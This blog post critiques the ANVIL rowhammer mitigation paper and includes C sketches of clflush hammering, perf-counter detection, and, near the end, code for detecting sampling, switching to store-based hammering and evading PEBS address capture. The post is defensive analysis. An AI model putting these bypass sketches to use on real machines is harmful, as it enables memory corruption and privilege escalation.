My ramblings
No technical stuff in here. If you are here for the tech, skip to the introduction.
First up, the KASLR blog part 2 is in progress. It might take a while, because there is a bit more meat on that bone than I’d expected and I want to do it right. But for now I hope you’ll enjoy this more speculative row hammer related post.
My all-time favorite paper is [1] “Factors affecting voluntary alcohol consumption in the albino rat” by Kalervo Eriksson. I haven’t read it. But everything about the title fascinates me. Why albino rats? What factors? Why does it intrigue me? Alcoholic rats? Binge drinking or occasional relaxation? Beer or whiskey? What is an albino rat hangover like? And most of all, what was the motivation of the author? I shall not know anytime soon, because I enjoy pondering these questions too much.
The second on my list is one I’ve actually read: [2] “Lessons from the Bell Curve” by James Heckman. I know James Heckman’s work pretty well, because I spent a few years studying micro-econometrics, and he is an amazing econometrician who was awarded the Nobel Prize for his work in this area. But this paper stood out to me. It is not about economics (at least not directly), and it was not a particularly original paper, since it took its starting point in a controversial book. The book, “The Bell Curve”, was about the influence and distribution of intelligence. The criticism this book received (and it was a lot) was mostly politically correct dissent that did not engage with the evidence-based research presented in the book. Heckman took the same data and systematically took it apart with state-of-the-art econometric methods, dismissing some conclusions and confirming others, with no regard to the political correctness of his results. It is, in my mind, too rare that this kind of paper gets published, yet it is very much at the core of science to check the robustness of other people’s results and to apply new methods to old data. That paper is my inspiration when I critique other people’s work on this blog.
Introduction
The subject of this blog post is a paper by [3] Aweke et al. called “ANVIL: Software-Based Protection Against Next-Generation Rowhammer Attacks” (it can be found here: http://iss.oy.ne.ro/). In it they first develop a cache-eviction-based row hammer attack to supplement the classic clflush attack, much along the lines of the rowhammer.js attack [6]. They then develop a mitigation method against row hammer, and I’ll spend some time looking into their work below. They test this method against the classic row hammer attack using clflush and against the cache-eviction-based attack. In this blog post I’ll first shortly summarize the paper, then comment on it, and finally look into how the mitigation might be bypassed by next-generation row hammer attacks. I shall not develop these next-generation attacks in full, so it is somewhat speculative whether they would actually work, but I hope to point in directions where row hammer could go in response to mitigations such as the one in this paper. There are a number of reasons for this. First, I don’t actually have access to their mitigation and thus cannot test against it. Secondly, I would have to borrow a computer to flip bits, as neither my computer nor my wife’s seems to get bit flips when row hammering. Third, I am somewhat reluctant to fully develop new attacks for which there currently is no protection. Finally, and most importantly, I’m a blogger and I’m doing this stuff after hours between all my other hobbies and obligations – it’s simply not within my time budget.
Despite any critique in here, I should make it very clear beforehand that I really like the paper and think it is an important contribution. If it wasn’t, I wouldn’t spend time on it. The method certainly passes the litmus test of raising attacker cost, and we must always remember that perfection is the enemy of the good. Unfortunately this blog post turned out a bit more technical than I would’ve liked. To really engage with it you need some knowledge of row hammer, performance counters and the cache subsystem. Regular readers of my blog should be ok.
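For readers who want a one-paragraph refresher before the summary: the classic attack reads two addresses that map to different rows in the same DRAM bank and flushes them from the cache after each read, so that every access activates a row in DRAM. Below is a minimal sketch in C; picking suitable aggressor addresses a1 and a2 is the hard part and is omitted here.

```c
#include <stdint.h>
#include <emmintrin.h> /* _mm_clflush */

/* Classic clflush-based row hammering. a1 and a2 are assumed to map to
 * different rows in the same DRAM bank. Each read activates a row; the
 * clflush ensures the next read misses the cache and goes to DRAM again. */
static void hammer(volatile uint8_t *a1, volatile uint8_t *a2, int count)
{
    for (int i = 0; i < count; i++) {
        (void)*a1;
        (void)*a2;
        _mm_clflush((const void *)a1);
        _mm_clflush((const void *)a2);
    }
}
```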
Ultra short summary of the Anvil paper
The paper’s results are:
1. Bit flips can be caused in 15ms.
2. Because of 1, the suggested mitigation of increasing the refresh rate on DRAM from a refresh every 64ms to one every 32ms is not sufficient protection.
3. Row hammer can be done without clflush. [5] Seaborn & Dullien suggested limiting access to clflush to kernel mode, and Google removed support for the clflush instruction in the NaCl sandbox. The authors show that this is not a viable solution, because one can use cache eviction to bypass the cache and access physical memory fast enough to cause row hammering.
4. Then they go on to develop a software mitigation: Anvil. Anvil works in 3 stages:
a. Stage 1: Using the fact that high rates of cache misses in the last level cache are rare on modern computers, Anvil uses the LLC cache miss performance counter as a first check for whether an attacker is row hammering. If LLC cache misses exceed a threshold per time unit, Anvil continues to the second stage; if not, it just continues monitoring. In addition to monitoring LLC cache misses, it also monitors the number of MEM_LOAD_UOPS_RETIRED_LLC_MISS events; this value gets used in the second stage. (A minimal code sketch of this kind of first-stage check follows after this list.)
b. Stage 2: In the second stage Anvil uses PEBS performance events to sample loads and/or stores. These performance counters can sample loads/stores above a given latency, and the authors set this latency to match that of a cache miss. The advantage of using these performance counters is that they provide the load/store address. This allows the authors to identify whether the same rows are being used again and again, or whether the access pattern is spread across memory and thus benign. If it’s not benign, Anvil proceeds to stage 3. To cut down on the overhead of sampling stores with PEBS, stores are only sampled if the MEM_LOAD_UOPS_RETIRED_LLC_MISS counter from the first stage was significantly smaller than the LLC misses. The thought here is that if only loads were seen in the first stage, a potential attack is not driven by stores.
c. Stage 3: Anvil has at this point detected a row hammer attack and will now thwart it. Because reading a row will automatically refresh it, Anvil uses the addresses found in the second stage to figure out which rows are being hammered and then issues reads to the neighboring rows.
5. The analysis of Anvil finds that it comes at a low performance cost: the first stage is cheap performance-wise, and it is rare that Anvil proceeds to stage 2.
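Since stage 1 essentially boils down to “count LLC misses per interval and compare against a threshold”, here is the minimal sketch promised above of what such a first-stage check could look like on Linux, using perf_event_open(). This is not Anvil’s code: the generic PERF_COUNT_HW_CACHE_MISSES event, the threshold and the interval are illustrative assumptions, and a real implementation would also track MEM_LOAD_UOPS_RETIRED_LLC_MISS for use in the second stage.

```c
#include <linux/perf_event.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <string.h>
#include <stdint.h>
#include <stdio.h>

/* Open a hardware counter; PERF_COUNT_HW_CACHE_MISSES usually maps to
 * LLC misses. pid = -1, cpu = 0: system-wide on CPU 0 (needs privileges). */
static int open_counter(uint64_t config)
{
    struct perf_event_attr attr;
    memset(&attr, 0, sizeof(attr));
    attr.size = sizeof(attr);
    attr.type = PERF_TYPE_HARDWARE;
    attr.config = config;
    attr.disabled = 1;
    return syscall(__NR_perf_event_open, &attr, -1, 0, -1, 0);
}

int main(void)
{
    int fd = open_counter(PERF_COUNT_HW_CACHE_MISSES);
    if (fd < 0) { perror("perf_event_open"); return 1; }

    const uint64_t THRESHOLD = 50000;  /* illustrative per-interval limit */
    for (;;) {
        uint64_t misses = 0;
        ioctl(fd, PERF_EVENT_IOC_RESET, 0);
        ioctl(fd, PERF_EVENT_IOC_ENABLE, 0);
        usleep(6000);                  /* ~6ms interval, as in the paper */
        ioctl(fd, PERF_EVENT_IOC_DISABLE, 0);
        if (read(fd, &misses, sizeof(misses)) != sizeof(misses)) break;
        if (misses > THRESHOLD)
            printf("LLC miss spike: %llu in 6ms -> escalate to stage 2\n",
                   (unsigned long long)misses);
    }
    return 0;
}
```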
The short commentary
Regular readers of this blog will not be surprised by most of what is found in the Anvil paper.
1. The 15ms the authors take to cause a bit flip seems a bit high. [4] Yoongu Kim et al. state that a refresh interval below 8.2ms is required to entirely kill row hammering, which again suggests that bit flips under “favorable” circumstances can be caused significantly faster.
2. It follows logically from 1 that lowering the refresh interval to 32ms does not completely deal with row hammer. Nishat Herath of Qualys and I pointed this out at Black Hat, and our slides and further comments can be found in my “Speaking at Black Hat” post.
3. That bit flips can be caused without clflush is also not a surprise. It confirms [6] Gruss, Maurice & Mangard, who went a step further, generated optimal cache eviction strategies and implemented a JavaScript-based attack.
4. Anvil:
a. Stage 1: This is exactly the same approach that I took in my first two blog posts on row hammer detection and mitigation, which formed the basis for Nishat’s and my talk at Black Hat. All come to the result that there is a high correlation between this performance counter and row hammer. [7] Gruss, Maurice & Wagner took it one step further, adjusted for overall memory activity, and they too got pretty good results. I noticed false positives in my work with this method, and this result is reproduced by the Anvil authors.
b. Stage 2: Here we have the first big new contribution of the paper, and it’s a great one. It certainly opens up new ways to think about cache attack detection and mitigation. It makes a natural connection between cache misses and actual row hammer, because you get addresses. I shall examine this method in more detail below; a sketch of what such PEBS-based sampling could look like follows after this list.
c. Stage 3: The method of mitigation by reading neighboring rows was suggested by Nishat and myself at our Black Hat talk. We only confirmed that reading victim rows would protect against row hammer; we didn’t actually use this in our mitigation work and instead suggested causing a slowdown when too many cache misses occurred. The reason is that we saw no good way of actually inspecting which addresses were being used. I must honestly say that I missed PEBS while designing this mitigation and found no good way of connecting a cache miss to an address. I shall analyze below to what extent Anvil succeeds at this. We suggested the slowdown as a “soft response” in light of the rare false positives in a.
5. The analysis of the performance penalty of Anvil relatively closely follows the results I had testing our mitigation system from Black Hat. I used an entirely different set of test applications and came to the same conclusions. Thus I can confirm that Anvil is likely to have a very low performance impact, which should be acceptable for most systems. The first stage is nearly free, and benign applications that get misdetected in the first stage are rare. I should note here that Aweke et al. use h264ref to test Anvil and find that this video encoder rarely triggers the first stage. However, h264ref is not representative of video encoders, for multiple reasons. In my own testing I had problems with an h264 video encoder (that I’ve coauthored) generating too many cache misses a great many times. h264ref is written to be portable and easily understood. Production video encoders are much more streamlined in their memory access, and particularly the heavy use of streaming instructions makes actual memory speed the limiting factor in many operations – especially motion search. Modern video encoders also utilize threading much more, and that puts the L3 cache under much more pressure than h264ref does. Also, to evaluate a video encoder’s impact on memory access it is important to use the right input material, because video encoders tend to shortcut additional calculation when they find something they estimate to be “good enough”. Nevertheless, this is probably mostly a personal comment – the authors’ conclusions generally match my results.
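To make the stage-2 idea more concrete, here is the sketch mentioned above of how one could ask Linux’s perf_event_open() for PEBS-assisted load-latency samples that include the data address. This is not Anvil’s code: the raw encoding 0x1cd is MEM_TRANS_RETIRED.LOAD_LATENCY on Sandy Bridge-era cores (check your model’s event tables), and the 180-cycle ldlat threshold and sample period are illustrative assumptions.

```c
#include <linux/perf_event.h>
#include <sys/syscall.h>
#include <string.h>
#include <unistd.h>

/* Open a PEBS-assisted load-latency sampler that records the data address
 * of loads slower than a latency threshold. Encoding and thresholds are
 * illustrative, not Anvil's actual parameters. */
static int open_load_latency_sampler(void)
{
    struct perf_event_attr attr;
    memset(&attr, 0, sizeof(attr));
    attr.size = sizeof(attr);
    attr.type = PERF_TYPE_RAW;
    attr.config = 0x1cd;        /* MEM_TRANS_RETIRED.LOAD_LATENCY (SNB-era) */
    attr.config1 = 180;         /* ldlat: only loads >= ~cache-miss latency */
    attr.sample_period = 100;   /* sample every 100th qualifying load */
    attr.sample_type = PERF_SAMPLE_ADDR | PERF_SAMPLE_WEIGHT;
    attr.precise_ip = 2;        /* request PEBS precision */
    attr.disabled = 1;
    attr.exclude_kernel = 1;
    /* pid = -1, cpu = 0: system-wide on CPU 0; needs privileges */
    return syscall(__NR_perf_event_open, &attr, -1, 0, -1, 0);
}
/* Samples are read from the event's mmap()'ed ring buffer (omitted here);
 * each carries the load's virtual address, which a monitor can translate
 * to a physical address and from there to a DRAM row. */
```

A kernel-mode implementation like Anvil’s has more direct access to the PEBS machinery, but the principle is the same: high-latency memory operations come annotated with the address they touched.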
Anvil and future row hammer attacks
Aweke et al. conclude: “We feel that these results show it is viable to protect current and future systems against row hammer attacks”. As always it is hard to tell what’s in the future, but my understanding of next-generation attacks is that they adapt to mitigation methods. In this section I shall outline what I think are weaknesses in Anvil that attacks could exploit in the future. Unfortunately I end up being a lot more pessimistic than the authors. Even if they are right, I’d still prefer a hardware solution such as pTRR or PARA. The reason for this is that I’m a strong believer in fixing problems at their root cause. Row hammer is a micro-architectural problem, and it should be fixed in the micro-architecture. Also, we should consider that DRAM is used in other devices than modern x86 computers. That said, until we see such a solution, software might be the only option, and Anvil and similar solutions are certainly candidates to fill the void.
My first source of pessimism is my work on the cache-coherency way of activating rows. I haven’t actually tested it, but I think it may bypass the LLC cache miss counter, as the cache line used for hammering never actually leaves the cache. See my blog post on MESI and row hammer for more details. Now, I don’t know if that method is fast enough for row hammering, but if it is, it may affect all software solutions suggested thus far, because all three hinge on the LLC_MISS counter. Should this attack actually be fast enough, and should it indeed avoid LLC cache misses, it is probably not a fatal problem. There are performance counters that cover this kind of event, it is rare in benign software, and thus we should be able to work around it; such counters could be implemented as a parallel option in stage 1 of Anvil.
Aweke et al. suggest using a 6ms sampling interval for stage 1 and a 6ms sampling interval for stage 2. This means they spend 12ms detecting an attack before they respond. With [4] suggesting that a refresh interval of 8.2ms is required to rule out row hammer attacks, this might actually give an attacker enough time to flip a bit. Aweke et al. suggest that 110k activations are required to cause bit flips; if we multiply this by the 55ns activation interval reported by [4], we end up with a lower bound on row hammering of only ~6ms (110,000 × 55ns ≈ 6.05ms). However, the authors also evaluate a version of Anvil with 2ms intervals, which they call Anvil-Heavy, and conclude that this version would work as well, despite slightly more overhead. It would seem that Anvil-Heavy is the more relevant version of Anvil if the row hammer mitigation is supposed to be “perfect”. It is conceivable that the crosstalk effects behind row hammer will become more serious with time as memory gets denser and faster. How much wiggle room Anvil has to compensate beyond Anvil-Heavy is in my opinion an open question. There are two factors: how much overhead lowering the intervals below 2ms will cause, through false positives in stage 1 and more sampling in stage 2; and that the sampling interval in stage 2 can only be shortened so much before too few samples are collected to determine the row locality of the hits. All this said, I think the article underestimates the performance cost of a truly secure implementation, though it might still be acceptable.
It should be noted that there is a good chance an attacker can gain a bit of introspection into Anvil. My guess is that if the attacker monitors latency in (say) a classic clflush row hammer attack, he will be able to see when Anvil switches to the second stage. The argument is that sampling with PEBS adds latency to the instructions being sampled – just interrupting the process is typically on the order of magnitude of 4000 CLKs with only rudimentary handling, and that is much less than what Anvil actually has to do. There is a reason Aweke et al. see performance penalties in the second stage. It is important to note that with latencies of this order of magnitude, anomalies can be detected by the attacker at very little cost, thus hardly disturbing the attack itself.
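A hedged sketch of what such attacker-side introspection could look like: time each hammering iteration with rdtscp and treat iterations far above the baseline as evidence of being sampled. The ~4000-CLK cutoff is the rough figure from the text, not a tuned value.

```c
#include <stdint.h>
#include <x86intrin.h> /* __rdtscp, _mm_clflush */

/* Time one clflush-hammer iteration. A latency far above the usual few
 * hundred CLKs suggests the process was interrupted, e.g. by PEBS
 * sampling in Anvil's second stage. */
static uint64_t timed_hammer_once(volatile uint8_t *a1, volatile uint8_t *a2)
{
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*a1;
    (void)*a2;
    _mm_clflush((const void *)a1);
    _mm_clflush((const void *)a2);
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
}
/* An attacker can track these timings at almost no cost: a sudden burst
 * of iterations above ~4000 CLKs would hint that stage 2 has engaged. */
```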
An example of how this could be used to bypass Anvil hinges on an implementation detail. Anvil does not sample store operations in the 2nd stage if store operations were rare in the first stage. This leaves room for an attacker to switch from a load-based attack to a store-based attack methodology mid-attack and thus outwit stage 2. This again isn’t a fatal flaw by any means and can be worked around by simply always sampling stores – and the overhead should be acceptable, given that it is rare in real life that the 2nd stage even engages. But again, the paper is probably underestimating the performance cost required for “perfect protection”. However, I don’t think this example is the real issue. The issue is that an attacker can adapt to the defense.
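To make this concrete, here is a hedged sketch of that adaptation, reusing the timing helper from the sketch above; the ~4000-CLK cutoff is again the rough figure from the text, and a real attack would probably require several consecutive anomalies before switching.

```c
/* Hammer with loads until the timings suggest we are being sampled, then
 * continue hammering with stores, which Anvil's second stage would not be
 * sampling if loads dominated during its first stage. */
static void adaptive_hammer(volatile uint8_t *a1, volatile uint8_t *a2)
{
    while (timed_hammer_once(a1, a2) < 4000)
        ;                       /* load-based phase, see sketch above */
    for (;;) {                  /* store-based phase */
        *a1 = 1;
        *a2 = 1;
        _mm_clflush((const void *)a1);
        _mm_clflush((const void *)a2);
    }
}
```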
The last issue with Anvil that I’ll cover in this blog post is that Anvil assumes that a high-latency instruction has high latency because of the loads and stores it does. While this holds true for traditional attacks, it is not a given. The cache subsystem and the hardware prefetchers are examples of off-core subsystems from which accesses directly to DRAM can originate without being part of loads and stores initiated by an instruction in the core. Here is an example of how PEBS can be tricked. I’ll keep it simple by only accessing memory from one row, but it should be clear how a second row could be added to do actual row hammering.
- 1. Let A be a cache-set-aligned address in an aggressor row
- 2. Let E be an eviction set for A. E consists of E1..EN, where N is the number of ways, and E1..EN are not in the same DRAM bank as A
- 3. Prime A’s cache set with E.
- 4. Use clflush to remove a way of E, thus creating a way in the set marked as Invalid
- 5. Use a store operation (mov [A],1) to set the invalid cache way to Modified, containing A.
- 6. Now evict A using E, causing a writeback of A.
- 7. Repeat from 4.
As for 2: this is easily done – there are plenty of addresses mapping to A’s cache set to pick from. 3: This is standard stuff. 4: We may get high latency here, but even if clflush is a store operation (which it may or may not be), it will not use A, and thus an irrelevant address will be stored by PEBS – also, the latency of a clflush is around 115 CLKs (on my wife’s Sandy Bridge), significantly below that of a cache miss. Further, this step might not actually be needed. 5: A 4-byte store operation does not load the rest of the cache line from DRAM (at least on my wife’s Sandy Bridge), thus the latency is low and the store will not be recorded by Anvil’s PEBS. 6: We do get latency here and we cause a writeback of A, but PEBS will record an address in E, which is irrelevant. Such a scheme may be too slow for actual row hammering, but I don’t think it is. After all, the normal eviction-based attack is 70% faster than the requirement of 110k activations in a 64ms refresh interval, according to [3]. Even if this turns out to be too slow for row hammering, it demonstrates that the second stage of Anvil may have severe deficits.
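To tie the steps above together, here is a minimal sketch in C of steps 3 to 6. Everything about the addresses is assumed: A and the eviction set E must map to the same cache set, E must lie in different DRAM banks than A, and the LLC associativity is machine dependent; building such sets is standard (cf. rowhammer.js) and omitted here.

```c
#include <stdint.h>
#include <emmintrin.h> /* _mm_clflush */

#define WAYS 12                    /* LLC associativity; machine dependent */

extern volatile uint8_t *A;        /* step 1: set-aligned address in the aggressor row */
extern volatile uint8_t *E[WAYS];  /* step 2: eviction set for A, other DRAM banks */

static void prime(void)            /* step 3: fill A's cache set with E */
{
    for (int i = 0; i < WAYS; i++)
        (void)*E[i];
}

static void hammer_iteration(void)
{
    /* Step 4: invalidate one way. The flushed address is in E, so even if
     * the clflush were sampled, PEBS would record an irrelevant address. */
    _mm_clflush((const void *)E[0]);

    /* Step 5: a short store places A in the freed way in the Modified
     * state; per the text this is low latency and below the PEBS threshold. */
    *A = 1;

    /* Step 6: re-prime with E, evicting A and forcing a writeback of A to
     * DRAM (a row activation); any sampled miss address lies in E, not A. */
    for (int i = 0; i < WAYS; i++)
        (void)*E[i];
}
/* Step 7: after an initial prime(), call hammer_iteration() in a loop. */
```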
Finally, as noted above, we can use the classic clflush method during the first stage of Anvil, before the sampling of stage 2 engages.
I can come up with other scenarios where this (and in some cases the other) software row hammer mitigation may fail, but I think I’ve placed enough on the table for this blog post.
Conclusion
The current implementation of Anvil is a low-overhead row hammer mitigation which will work well against attacks that are not engineered to bypass it. Should Anvil become widespread, it is likely that next-generation methods of row hammering will emerge that are capable of bypassing Anvil’s second stage. Thus, if I were to choose a method for row hammer mitigation for a mission-critical system, I would go with the suggestion made by [7]: triggering a simple slowdown in the event of a detection. It has the benefit of thwarting some cache side-channel attacks in the process. While this has a much higher performance penalty for a few applications, it will run at the same performance cost as Anvil in most real-world scenarios, and its simplicity offers less attack surface for engineered attacks.
Literature
[1] Kalervo Eriksson: “Factors affecting voluntary alcohol consumption in the albino rat”. Annales Zoologici Fennici, Vol. 6, No. 3 (1969), pp. 227-265.
[2] James J. Heckman: “Lessons from the Bell Curve”. Journal of Political Economy, Vol. 103, No. 5 (Oct. 1995), pp. 1091-1120.
[3] Zelalem Birhanu Aweke, Salessawi Ferede Yitbarek, Rui Qiao, Reetuparna Das, Matthew Hicks, Yossi Oren, Todd Austin: “ANVIL: Software-Based Protection Against Next-Generation Rowhammer Attacks”.
[4] Yoongu Kim, R. Daly, J. Kim, C. Fallin, Ji Hye Lee, Donghyuk Lee, C. Wilkerson, K. Lai, and O. Mutlu: “Flipping Bits in Memory Without Accessing Them: An Experimental Study of DRAM Disturbance Errors”. In Computer Architecture (ISCA), 2014 ACM/IEEE 41st International Symposium on, pages 361-372, June 2014.
[5] Mark Seaborn and Thomas Dullien: “Exploiting the DRAM rowhammer bug to gain kernel privileges”. March 2015.
[6] D. Gruss, C. Maurice, and S. Mangard: “Rowhammer.js: A Remote Software-Induced Fault Attack in JavaScript”. ArXiv e-prints, July 2015.
[7] D. Gruss, C. Maurice, and K. Wagner: “Flush+Flush: A Stealthier Last-Level Cache Attack”. http://arxiv.org/abs/1511.04594